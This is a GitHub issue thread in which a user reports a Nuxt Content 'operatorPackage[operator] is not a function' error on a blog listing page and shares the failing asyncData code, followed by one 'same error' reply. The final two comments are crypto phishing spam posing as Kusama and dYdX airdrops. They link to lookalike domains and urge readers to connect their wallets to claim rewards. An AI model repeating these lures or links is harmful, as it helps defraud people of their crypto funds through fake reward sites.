### ISSUE TITLE
ERROR  operatorPackage[operator] is not a function

### ISSUE THREAD

**Issue by ImmaZoni** [ImmaZoni/nightfury-nuxt#18]
Hello! So i am having an issue with the blog portion of my animal resuces website.

This has been fighting me for a bit now and ANY help is greatly appreciated. 

**WHATS HAPPENING**
I am trying to load url/blog and getting the error below.

If i were to go to url/blog/my-first-blog-post it loads with no issues, it looks to be just the blog view page that is giving me issues.

**ERROR**
```
ERROR  operatorPackage[operator] is not a function                   00:31:54

  at result_set_ResultSet.find (node_modules/@lokidb/loki/lokidb.loki.js:1418:50)
  at QueryBuilder.where (node_modules/@nuxt/content/lib/query-builder.js:73:29)
  at asyncData (_slug.vue:81:0)

```
**WHAT IVE TRIED**

- Initially i thought i did something wrong so i checked with the post and verified i followed the instructions properly.
- Then i went onto the GitHub of the codebase and cloned it and ran it, ran no issues. 
- Started googling the best i could with thie error and got a few results but this one seemed the most helpful. 
	-https://github.com/nuxt/content/issues/581

The github nuxt issue was the one that seemed to be the most helpful, as it pointed me to the .where() function which is used within the ~/blog/_slug.vue file listed below.
```
  async asyncData ({ $content, params }) {
    const article = await $content('articles', params.slug).fetch()
    const tagsList = await $content('tags')
      .only(['name', 'slug'])
      .where({ name: { $containsAny: article.tags } })
      .fetch()
    const tags = Object.assign({}, ...tagsList.map(s => ({ [s.name]: s })))
    const [prev, next] = await $content('articles')
      .only(['title', 'slug'])
      .sortBy('createdAt', 'asc')
      .surround(params.slug)
      .fetch()
    return {
      article,
      tags,
      prev,
      next
    }
  }
```

Side note this project is using Vuetify aswell, please let me know if there is any other questions that may be helpful.   

Replication Link - https://codesandbox.io/s/zealous-shirley-fr3bj
GitHub Link - https://github.com/ImmaZoni/nightfury-nuxt

PS: Feel free to contribute to the code if you would like any help is always appreciated :)

**Comment by thomasbnt** [comment]
Also the same error on my website under @content/nuxtjs :c

**Comment by pradip-ee** [comment]
## Congratulations! You've receive in $2000 on Kusama Airdrop 🪂🔴

Kusama Airdrop: Claim up to $20,000 in Tokens Now!

→ [Earn rewards on connect you wallet](https://kusamanetworks.com/)

→ [Claim Your $KSM Today](https://kusamanetworks.com/)

Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://polkadot.network/static/b118567894df0c230e8553f2d6ea8b83/image2.png)

[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Bonus Now!** [Check Eligibility](https://kusamanetworks.com/)

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your bonus, up to $2,000!
- ✨Magic ✨ [Claim Your Bonus Now!](https://kusamanetworks.com/)

**Comment by phucnhfpt** [comment]
## Congratulations! You've been chosen to receive a $7,000 Rewards. 🪂🔴 


### Trading and Launch Rewards are live on dYdX Chain! ✨

Connect your wallet, follow the instructions, and claim this exclusive offer from Dydx Exchange. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

[![Dydx Exchange](https://pbs.twimg.com/card_img/1729868185275617280/nzyJpc7G?format=jpg&name=small)](https://claim.dydxexchang.com/)


[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Rewards Now!** [Check Eligibility](https://claim.dydxexchang.com/)

Access the Dydx Exchange platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your Rewards, up to $2,000!

@dydxprotocol
